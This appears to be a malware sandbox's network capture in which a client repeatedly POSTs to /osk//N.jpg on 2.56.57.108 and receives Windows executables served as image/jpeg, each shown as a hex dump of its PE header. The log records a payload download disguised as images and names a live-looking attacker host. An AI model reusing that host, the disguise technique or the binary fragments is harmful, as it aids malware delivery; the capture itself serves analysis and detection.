Jan 6, 2022 07:57:28.037177086 CET	720	IN	HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:28 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 Last-Modified: Sun, 06 Aug 2017 19:52:20 GMT ETag: "9d9d8-5561b116cc500" Accept-Ranges: bytes Content-Length: 645592 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 33 00 00 00 00 00 84 0d 00 00 00 b0 08 00 00 0e 00 00 00 38 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 37 37 00 00 00 00 00 94 0b 00 00 00 c0 08 00 00 0c 00 00 00 46 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 39 00 00 00 00 00 04 05 00 00 00 d0 08 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL=Sv?!X` 8 L'p.text`0`.data@@.rdata$@@@.bss@.edata@0@.idataL@0.CRT@0.tls @0.reloc'(@0B/4`0@@B/19@@B/35MP@B/51`C`D@B/638@B/77F@B/89
Jan 6, 2022 07:57:28.963116884 CET	1394	OUT	POST /osk//2.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 2.56.57.108 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Jan 6, 2022 07:57:28.992214918 CET	1395	IN	HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:28 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 Last-Modified: Thu, 06 Jun 2019 04:00:58 GMT ETag: "519d0-58a9fc2e87280" Accept-Ranges: bytes Content-Length: 334288 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$/AVAVAVVAV]@WAV1VAV]BWAV]DWAV]EWAV@WAVO@WAV@VAVOBWAVOEWAVOAWAVOVAVOCWAVRichAVPELb["!f)ps@pP@xP0T@8.textt `.rdata@@.data,H@.rsrcx@@@.relocP@B
Jan 6, 2022 07:57:29.467391968 CET	1745	OUT	POST /osk//3.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 2.56.57.108 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Jan 6, 2022 07:57:29.495383024 CET	1747	IN	HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:29 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 Last-Modified: Thu, 06 Jun 2019 04:01:20 GMT ETag: "217d0-58a9fc4382400" Accept-Ranges: bytes Content-Length: 137168 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$U;;;;W;8;?;:;>;:;:w;?;>;;;;9;Rich;PEL_["!z@3@A@t, x0hTTh@l.textxz `.rdata^ef~@@.data@.didat8@.rsrcx @@.reloch0@B
Jan 6, 2022 07:57:29.806976080 CET	1889	OUT	POST /osk//4.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 2.56.57.108 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Jan 6, 2022 07:57:29.835700035 CET	1890	IN	HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:29 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 Last-Modified: Thu, 06 Jun 2019 04:01:30 GMT ETag: "6b738-58a9fc4d0ba80" Accept-Ranges: bytes Content-Length: 440120 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AV5=A;";;;;;;-;RichPEL8'Y"!P az@ACR,x8?4:f8(@P@@.textr `.data( @.idata6P @@.didat4p6@.rsrc8@@.reloc4:<<@B
Jan 6, 2022 07:57:30.285327911 CET	2348	OUT	POST /osk//5.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 2.56.57.108 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Jan 6, 2022 07:57:30.316315889 CET	2350	IN	HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:30 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 Last-Modified: Thu, 06 Jun 2019 04:01:44 GMT ETag: "1303d0-58a9fc5a65a00" Accept-Ranges: bytes Content-Length: 1246160 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#4gZgZgZnsZ[eZBcZYjZ_mZ^lZE[oZ[dZg[Z^mZZfZfZXfZRichgZPELb["!w@@=Tp}pT@.text `.rdataRT@@.datatG`"B@.rsrcpd@@.reloc}~h@B
Jan 6, 2022 07:57:31.348520041 CET	3654	OUT	POST /osk//7.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 2.56.57.108 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Jan 6, 2022 07:57:31.376979113 CET	3655	IN	HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:31 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 Last-Modified: Thu, 06 Jun 2019 04:02:02 GMT ETag: "14748-58a9fc6b90280" Accept-Ranges: bytes Content-Length: 83784 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 